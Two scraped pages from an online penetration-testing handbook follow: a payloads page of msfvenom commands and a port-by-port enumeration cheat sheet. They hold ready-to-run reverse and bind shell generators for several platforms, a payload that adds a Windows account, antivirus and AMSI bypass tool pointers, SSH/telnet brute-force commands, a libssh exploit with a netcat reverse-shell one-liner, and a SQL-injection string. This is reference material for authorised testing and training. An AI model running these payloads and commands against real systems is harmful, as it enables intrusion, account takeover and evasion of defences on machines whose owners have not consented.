[Markdown](https://www.pentest-book.com/exploitation/payloads.md) . [](https://www.pentest-book.com/exploitation/payloads#msfvenom) msfvenom ----------------------------------------------------------------------------- Copy # Creating a payload msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport] # List of payloads msfvenom -l payloads # Payload options msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options # Creating a payload with encoding msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile # Creating a payload using a template msfvenom -p [payload] -x [template] -f [formattype] > outputfile # Listener for MSfvenom Payloads: msf5>use exploit/multi/handler msf5>set payload windows/meterpreter/reverse_tcp msf5>set lhost msf5>set lport msf5> set ExitOnSession false msf5>exploit -j # Windows Payloads msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe # Linux Payloads msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf # Add a user in windows with msfvenom: msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe # Web Payloads # PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php # ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp # JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp # WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war # Scripting Payloads # Python msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py # Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh # Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl # Creating an Msfvenom Payload with an encoder while removing bad charecters: msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D" https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/ [](https://www.pentest-book.com/exploitation/payloads#bypass-av) Bypass AV ------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/payloads#bypass-amsi) Bypass Amsi ----------------------------------------------------------------------------------- [](https://www.pentest-book.com/exploitation/payloads#office-docs) Office Docs ----------------------------------------------------------------------------------- [PreviousK8s Admission Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass) [NextReverse Shells](https://www.pentest-book.com/exploitation/reverse-shells) Last updated 6 years ago Was this helpful? * [msfvenom](https://www.pentest-book.com/exploitation/payloads#msfvenom) * [Bypass AV](https://www.pentest-book.com/exploitation/payloads#bypass-av) * [Bypass Amsi](https://www.pentest-book.com/exploitation/payloads#bypass-amsi) * [Office Docs](https://www.pentest-book.com/exploitation/payloads#office-docs) Was this helpful? Copy # Veil Framework: https://github.com/Veil-Framework/Veil # Shellter https://www.shellterproject.com/download/ # Sharpshooter # https://github.com/mdsecactivebreach/SharpShooter # Javascript Payload Stageless: SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 # Stageless HTA Payload: SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee # Staged VBS: SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 # Donut: https://github.com/TheWover/donut # Vulcan https://github.com/praetorian-code/vulcan Copy # Testing for Amsi Bypass: https://github.com/rasta-mouse/AmsiScanBufferBypass # Amsi-Bypass-Powershell https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell https://blog.f-secure.com/hunting-for-amsi-bypasses/ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans https://slaeryan.github.io/posts/falcon-zero-alpha.html Copy https://github.com/thelinuxchoice/eviloffice https://github.com/thelinuxchoice/evilpdf --- # Ports | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/ports.md) . [](https://www.pentest-book.com/enumeration/ports#general) General ----------------------------------------------------------------------- AIO [Penetration Testing Methodology - 0DAYsecurity.com](http://0daysecurity.com/penetration-testing/enumeration.html) [](https://www.pentest-book.com/enumeration/ports#port-21-ftp) Port 21 - FTP --------------------------------------------------------------------------------- Copy nmap --script ftp-* -p 21 10.11.1.111 [](https://www.pentest-book.com/enumeration/ports#port-22-ssh) Port 22 - SSH --------------------------------------------------------------------------------- * If you have usernames test login with username:username * Vulnerable Versions to user enum: <7.7 Copy # Enum SSH # Get version nmap 10.11.1.1 -p22 -sV # Get banner nc 10.11.1.1 22 # Get login banner ssh root@10.11.11.1 # Get algorythms supporteed nmap -p22 10.11.1.1 --script ssh2-enum-algos # Check weak keys nmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full # Check auth methods nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin" # User can ask to execute a command right after authentication before it’s default command or shell is executed $ ssh -v user@10.10.1.111 id ... Password: debug1: Authentication succeeded (keyboard-interactive). Authenticated to 10.10.1.111 ([10.10.1.1114]:22). debug1: channel 0: new [client-session] debug1: Requesting no-more-sessions@openssh.com debug1: Entering interactive session. debug1: pledge: network debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0 debug1: Sending command: id debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0 uid=1000(user) gid=100(users) groups=100(users) debug1: channel 0: free: client-session, nchannels 1 Transferred: sent 2412, received 2480 bytes, in 0.1 seconds Bytes per second: sent 43133.4, received 44349.5 debug1: Exit status 0 # Check Auth Methods: $ ssh -v 10.10.1.111 OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019 ... debug1: Authentications that can continue: publickey,password,keyboard-interactive # Force Auth Method: $ ssh -v 10.10.1.111 -o PreferredAuthentications=password ... debug1: Next authentication method: password # BruteForce: patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.' hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111 medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111 # LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access # Id python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id # Reverse python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f" # SSH FUZZ # https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt # cpan Net::SSH2 ./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user use auxiliary/fuzzers/ssh/ssh_version_2 # SSH-AUDIT # https://github.com/arthepsy/ssh-audit # Enum users < 7.7: # https://www.exploit-db.com/exploits/45233 https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a" # SSH Leaks: https://shhgit.darkport.co.uk/ # SSH bruteforce # https://github.com/kitabisa/ssb [](https://www.pentest-book.com/enumeration/ports#port-23-telnet) Port 23 - Telnet --------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-25-smtp) Port 25 - SMTP ----------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-43-whois) Port 43 - Whois ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-53-dns) Port 53 - DNS --------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-69-udp-tftp) Port 69 - UDP - TFTP --------------------------------------------------------------------------------------------- * Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more. * Same checks as FTP Port 21. [](https://www.pentest-book.com/enumeration/ports#port-79-finger) Port 79 - Finger --------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-88-kerberos) Port 88 - Kerberos ------------------------------------------------------------------------------------------- Check [Kerberos dedicated](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks) section [](https://www.pentest-book.com/enumeration/ports#port-110-pop3) Port 110 - Pop3 ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-111-rpcbind) Port 111 - Rpcbind ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-135-msrpc) Port 135 - MSRPC --------------------------------------------------------------------------------------- Some versions are vulnerable. Named pipe Description Service or process Interface identifier atsvc [atsvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_scheduler.html) interface (Scheduler service) mstask.exe 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 AudioSrv [AudioSrv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_audio.html) interface (Windows Audio service) AudioSrv 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 v1.0 browser (ntsvcs alias) [browser](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html) interface (Computer Browser service) Browser 6bffd098-a112-3610-9833-012892020162 v0.0 cert [ICertPassage](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_certsrv.html) interface (Certificate services) certsrv.exe 91ae6020-9e3c-11cf-8d7c-00aa00c091be v0.0 Ctx\_Winstation\_API\_Service [winstation\_rpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_termsrv.html) interface termsrv.exe 5ca4a760-ebb1-11cf-8611-00a0245420ed v1.0 DAV RPC SERVICE [davclntrpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_davclntrpc.html) interface (WebDAV client service) WebClient c8cb7687-e6d3-11d2-a958-00c04f682e16 v1.0 dnsserver [DnsServer](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_dns.html) interface (DNS Server service) dns.exe 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 epmapper [epmp](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/rpcss_msrpc_interfaces.html) interface (RPC endpoint mapper) RpcSs e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0 eventlog (ntsvcs alias) [eventlog](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_eventlog.html) interface (Eventlog service) Eventlog 82273fdc-e32a-18c3-3f78-827929dc23ea v0.0 HydraLsPipe Terminal Server Licensing lserver.exe 3d267954-eeb7-11d1-b94e-00c04fa3080d v1.0 InitShutdown [InitShutdown](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winlogon_w2k.html) interface winlogon.exe 894de0c0-0d55-11d3-a322-00c04fa321a1 v1.0 keysvc [IKeySvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_cryptsvc.html) interface (Cryptographic services) CryptSvc 8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0 keysvc [ICertProtect](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_cryptsvc.html) interface (Cryptographic services) CryptSvc 0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0 locator [NsiS](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_locator.html) interface (RPC Locator service) locator.exe d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 v1.0 llsrpc [llsrpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_llsrpc.html) interface (Licensing Logging service) llssrv.exe 342cfd40-3c6c-11ce-a893-08002b2e9c6d v0.0 lsarpc (lsass alias) [lsarpc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_lsarpc.html) interface lsass.exe 12345778-1234-abcd-ef00-0123456789ab v0.0 lsarpc (lsass alias) [dssetup](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_dssetup.html) interface lsass.exe 3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0 msgsvc (ntsvcs alias) [msgsvcsend](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msgsvc.html) interface (Messenger service) messenger 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 nddeapi [nddeapi](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_nddeapi.html) interface (NetDDE service) netdde.exe 2f5f3220-c126-1076-b549-074d078619da v1.2 netdfs [netdfs](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_netdfs.html) interface (Distributed File System service) Dfssvc 4fc742e0-4a10-11cf-8273-00aa004ae673 v3.0 netlogon (lsass alias) [netlogon](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_netlogon.html) interface (Net Logon service) Netlogon 12345678-1234-abcd-ef00-01234567cffb v1.0 ntsvcs [pnp](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_pnp.html) interface (Plug and Play service) PlugPlay 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 plugplay [pnp](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_pnp.html) interface (Plug and Play Windows Vista service) PlugPlay 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 policyagent [PolicyAgent](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_ipsec_w2k.html) interface (IPSEC Policy Agent (Windows 2000)) PolicyAgent d335b8f6-cb31-11d0-b0f9-006097ba4e54 v1.5 ipsec [winipsec](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winipsec.html) interface (IPsec Services) PolicyAgent 12345678-1234-abcd-ef00-0123456789ab v1.0 ProfMapApi [pmapapi](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winlogon_w2k.html) interface winlogon.exe 369ce4f0-0fdc-11d3-bde8-00c04f8eee78 v1.0 protected\_storage [IPStoreProv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_protected_storage.html) interface (Protected Storage) lsass.exe c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0 ROUTER Remote Access mprdim.dll 8f09f000-b7ed-11ce-bbd2-00001a181cad v0.0 samr (lsass alias) [samr](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_samr.html) interface lsass.exe 12345778-1234-abcd-ef00-0123456789ac v1.0 scerpc [SceSvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_sce.html) services.exe 93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0 SECLOGON [ISeclogon](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_seclogon.html) interface (Secondary logon service) seclogon 12b81e99-f207-4a4c-85d3-77b42f76fd14 v1.0 SfcApi [sfcapi](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_sfcapi.html) interface (Windows File Protection) winlogon.exe 83da7c00-e84f-11d2-9807-00c04f8ec850 v2.0 spoolss [spoolss](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_spoolss.html) interface (Spooler service) spoolsv.exe 12345678-1234-abcd-ef00-0123456789ab v1.0 srvsvc (ntsvcs alias) [srvsvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html) interface (Server service) services.exe (w2k) or svchost.exe (wxp and w2k3) 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 ssdpsrv [ssdpsrv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_ssdpsrv.html) interface (SSDP service) ssdpsrv 4b112204-0e19-11d3-b42b-0000f81feb9f v1.0 svcctl (ntsvcs alias) [svcctl](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_svcctl.html) interface (Services control manager) services.exe 367aeb81-9844-35f1-ad32-98f038001003 v2.0 tapsrv [tapsrv](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_tapsrv.html) interface (Telephony service) Tapisrv 2f5f6520-ca46-1067-b319-00dd010662da v1.0 trkwks [trkwks](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_trkwks.html) interface (Distributed Link Tracking Client) Trkwks 300f3532-38cc-11d0-a3f0-0020af6b0add v1.2 W32TIME (ntsvcs alias) [w32time](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_w32time.html) interface (Windows Time (Windows 2000 and XP)) w32time 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 W32TIME\_ALT [w32time](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_w32time.html) interface (Windows Time (Windows Server 2003, Windows Vista)) w32time 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 winlogonrpc [GetUserToken](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winlogon_w2k.html) interface winlogon.exe a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 v1.0 winreg [winreg](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winreg.html) interface (Remote registry service) RemoteRegistry 338cd001-2244-31f1-aaaa-900038001003 v1.0 winspipe [winsif](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_winsif.html) interface (WINS service) wins.exe 45f52c28-7f9f-101a-b52b-08002b2efabe v1.0 wkssvc (ntsvcs alias) [wkssvc](https://web.archive.org/web/20171012160520/http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_wkssvc.html) interface (Workstation service) services.exe (w2k) or svchost.exe (wxp and w2k3) 6bffd098-a112-3610-9833-46c3f87e345a v1.0 [](https://www.pentest-book.com/enumeration/ports#port-139-445-smb) Port 139/445 - SMB ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-161-162-udp-snmp) Port 161/162 UDP - SNMP ----------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-389-636-ldap) Port 389,636 - LDAP --------------------------------------------------------------------------------------------- Check [AD](https://www.pentest-book.com/post-exploitation/windows/ad) section and this [LDAP](https://malicious.link/post/2022/ldapsearch-reference/) guide [](https://www.pentest-book.com/enumeration/ports#port-443-https) Port 443 - HTTPS --------------------------------------------------------------------------------------- Read the actual SSL CERT to: * find out potential correct vhost to GET * is the clock skewed * any names that could be usernames for bruteforce/guessing. [](https://www.pentest-book.com/enumeration/ports#port-500-isakmp-ike) Port 500 - ISAKMP IKE ------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-513-rlogin) Port 513 - Rlogin ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-541-fortinet-sslvpn) Port 541 - FortiNet SSLVPN ----------------------------------------------------------------------------------------------------------- [Fortinet Ports Guide](https://help.fortinet.com/fos50hlp/54/Content/FortiOS/fortigate-ports-and-protocols-54/Images/FortiGate.png) [SSL VPN Leak](https://opensecurity.global/forums/topic/181-fortinet-ssl-vpn-vulnerability-from-may-2019-being-exploited-in-wild/?__cf_chl_jschl_tk__=42e37b31a0585f7dae3dbce18cafde7c39b81976-1578385705-0-AcuYzrPMO1OuMo59JSPYyzZjiXNbMAIl6sKiXwhQRbMUMZq1Kp3VmWqIVXWZdzTZgFCecXue1Z6xXxU-Rql_GT_ovKiar_-i0CUCKFS85bfNXnUzuOuIwomXje-kH87mNbVHzzh9ediRfVWbJjwtO-ttLEYi7quczLlHQk38UqcumrARs77RrK2mj9zOb8Uwhv6av4QZ9od4fgAIl-F4Kff26MPQjs4LRHsgk5zH6RVwFMP8NdOnCrrzkkGH6_R9Dtw89_QtiOsH1nKB0hBDbtJ2O9AkkMDqw7tl1ip_pVDfnw1lvaZtFq1sRqgYwpan-n6n9f58Xdjcj2UGFKdE32OS7Ete8X7RwXUV9FGUSOhAM5_iK0kMNJg3mskrFVQz0lONaZVvFRdf_1rp69J4oRVat1m7KIQEGpRDe4OvYUb7pfQkNKLcK5s_lVIj2SAJQQ) [](https://www.pentest-book.com/enumeration/ports#port-1433-mssql) Port 1433 - MSSQL ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-1521-oracle) Port 1521 - Oracle ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-2000-cisco-sccp) Port 2000 - Cisco sccp --------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-2049-nfs) Port 2049 - NFS ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-2100-oracle-xml-db) Port 2100 - Oracle XML DB --------------------------------------------------------------------------------------------------------- Default passwords: [https://docs.oracle.com/cd/B10501\_01/win.920/a95490/username.htm](https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm) [](https://www.pentest-book.com/enumeration/ports#port-3306-mysql) Port 3306 - MySQL ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-3389-rdp) Port 3389 - RDP ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-5432-postgresql) Port 5432 - PostgreSQL --------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-5900-vnc) Port 5900 - VNC ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-5984-couchdb) Port 5984 - CouchDB --------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-5985-winrm) Port 5985 - WinRM ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-6379-redis) Port 6379 - Redis ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-8172-msdeploy) Port 8172 - MsDeploy ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/ports#port-5601-9200) Port 5601/9200 ------------------------------------------------------------------------------------- [ELK](https://www.pentest-book.com/enumeration/webservices/elk) [](https://www.pentest-book.com/enumeration/ports#port-27017-19-27080-28017-mongodb) Port 27017-19/27080/28017 - MongoDB ----------------------------------------------------------------------------------------------------------------------------- [MongoDB](https://www.pentest-book.com/enumeration/webservices/nosql-and-and-mongodb) [](https://www.pentest-book.com/enumeration/ports#unknown-ports) Unknown ports ----------------------------------------------------------------------------------- * `amap -d 10.11.1.111 8000` * netcat: makes connections to ports. Can echo strings or give shells: `nc -nv 10.11.1.111 110` * sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations [](https://www.pentest-book.com/enumeration/ports#rce-ports) RCE ports --------------------------------------------------------------------------- ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MLGrmoT-h9HJFisWAcF%252F-MLGsLNQURVNPdeBP_yr%252Fimage.png%3Falt%3Dmedia%26token%3D8149a413-e54b-4096-8a67-66085216c5e5&width=768&dpr=3&quality=100&sign=d7dc5854&sv=2) [PreviousSSL/TLS](https://www.pentest-book.com/enumeration/ssl-tls) [NextWeb Attacks](https://www.pentest-book.com/enumeration/web) Last updated 4 years ago Was this helpful? * [General](https://www.pentest-book.com/enumeration/ports#general) * [Port 21 - FTP](https://www.pentest-book.com/enumeration/ports#port-21-ftp) * [Port 22 - SSH](https://www.pentest-book.com/enumeration/ports#port-22-ssh) * [Port 23 - Telnet](https://www.pentest-book.com/enumeration/ports#port-23-telnet) * [Port 25 - SMTP](https://www.pentest-book.com/enumeration/ports#port-25-smtp) * [Port 43 - Whois](https://www.pentest-book.com/enumeration/ports#port-43-whois) * [Port 53 - DNS](https://www.pentest-book.com/enumeration/ports#port-53-dns) * [Port 69 - UDP - TFTP](https://www.pentest-book.com/enumeration/ports#port-69-udp-tftp) * [Port 79 - Finger](https://www.pentest-book.com/enumeration/ports#port-79-finger) * [Port 88 - Kerberos](https://www.pentest-book.com/enumeration/ports#port-88-kerberos) * [Port 110 - Pop3](https://www.pentest-book.com/enumeration/ports#port-110-pop3) * [Port 111 - Rpcbind](https://www.pentest-book.com/enumeration/ports#port-111-rpcbind) * [Port 135 - MSRPC](https://www.pentest-book.com/enumeration/ports#port-135-msrpc) * [Port 139/445 - SMB](https://www.pentest-book.com/enumeration/ports#port-139-445-smb) * [Port 161/162 UDP - SNMP](https://www.pentest-book.com/enumeration/ports#port-161-162-udp-snmp) * [Port 389,636 - LDAP](https://www.pentest-book.com/enumeration/ports#port-389-636-ldap) * [Port 443 - HTTPS](https://www.pentest-book.com/enumeration/ports#port-443-https) * [Port 500 - ISAKMP IKE](https://www.pentest-book.com/enumeration/ports#port-500-isakmp-ike) * [Port 513 - Rlogin](https://www.pentest-book.com/enumeration/ports#port-513-rlogin) * [Port 541 - FortiNet SSLVPN](https://www.pentest-book.com/enumeration/ports#port-541-fortinet-sslvpn) * [Port 1433 - MSSQL](https://www.pentest-book.com/enumeration/ports#port-1433-mssql) * [Port 1521 - Oracle](https://www.pentest-book.com/enumeration/ports#port-1521-oracle) * [Port 2000 - Cisco sccp](https://www.pentest-book.com/enumeration/ports#port-2000-cisco-sccp) * [Port 2049 - NFS](https://www.pentest-book.com/enumeration/ports#port-2049-nfs) * [Port 2100 - Oracle XML DB](https://www.pentest-book.com/enumeration/ports#port-2100-oracle-xml-db) * [Port 3306 - MySQL](https://www.pentest-book.com/enumeration/ports#port-3306-mysql) * [Port 3389 - RDP](https://www.pentest-book.com/enumeration/ports#port-3389-rdp) * [Port 5432 - PostgreSQL](https://www.pentest-book.com/enumeration/ports#port-5432-postgresql) * [Port 5900 - VNC](https://www.pentest-book.com/enumeration/ports#port-5900-vnc) * [Port 5984 - CouchDB](https://www.pentest-book.com/enumeration/ports#port-5984-couchdb) * [Port 5985 - WinRM](https://www.pentest-book.com/enumeration/ports#port-5985-winrm) * [Port 6379 - Redis](https://www.pentest-book.com/enumeration/ports#port-6379-redis) * [Port 8172 - MsDeploy](https://www.pentest-book.com/enumeration/ports#port-8172-msdeploy) * [Port 5601/9200](https://www.pentest-book.com/enumeration/ports#port-5601-9200) * [Port 27017-19/27080/28017 - MongoDB](https://www.pentest-book.com/enumeration/ports#port-27017-19-27080-28017-mongodb) * [Unknown ports](https://www.pentest-book.com/enumeration/ports#unknown-ports) * [RCE ports](https://www.pentest-book.com/enumeration/ports#rce-ports) Was this helpful? Copy # Get banner telnet 10.11.1.110 # Bruteforce password patator telnet_login host=10.11.1.110 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:' Copy nc -nvv 10.11.1.111 25 HELO foo telnet 10.11.1.111 25 VRFY root nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111 smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111 # SMTP relay msfconsole use auxiliary/scanner/smtp/smtp_relay set RHOSTS set MAILFROM set MAILTO run # Send email unauth: MAIL FROM:admin@admin.com RCPT TO:DestinationEmail@DestinationDomain.com DATA test . Receive: 250 OK Copy whois -h 10.10.1.111 -p 43 "domain.com" echo "domain.com" | nc -vn 10.10.1.111 43 whois -h 10.10.1.111 -p 43 "a') or 1=1#" Copy # Transfer zone dig AXFR domain.com @10.10.10.10 # dig +multi AXFR @ns1.insecuredns.com insecuredns.com dnsrecon -t axfr -d domain fierce -dns domain.com Copy nmap -p69 --script=tftp-enum.nse 10.11.1.111 Copy nc -vn 10.11.1.111 79 echo "root" | nc -vn 10.11.1.111 79 # User enumeration finger 